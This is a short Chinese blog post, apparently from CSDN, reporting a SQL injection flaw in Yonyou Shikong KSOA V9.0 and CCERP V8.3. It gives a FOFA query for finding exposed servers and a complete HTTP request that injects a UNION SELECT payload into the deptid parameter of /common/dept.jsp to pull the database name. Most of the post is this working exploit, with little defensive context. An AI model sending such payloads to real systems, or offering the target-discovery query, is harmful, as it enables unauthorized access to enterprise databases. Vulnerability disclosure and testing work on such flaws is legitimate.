用友时空KSOA、CCERP sql注入漏洞

文章探讨了用友时空软件中的安全漏洞,涉及版本更新,指出可通过特定请求方式复现,重点关注于企业系统的Web应用安全问题。
摘要由CSDN通过智能技术生成

影响版本

用友时空 KSOA V9.0
用友时空 CCERP V8.3

复现

FOFA:app=“用友-时空KSOA”

在这里插入图片描述

测试地址

image.png

GET /common/dept.jsp?deptid=1'%20UNION%20ALL%20SELECT%2060%2Cdb_name()-- HTTP/1.1

Host: your-IP

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Connection: close

出现如下图所示:代表存在漏洞
image.png
image.png

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值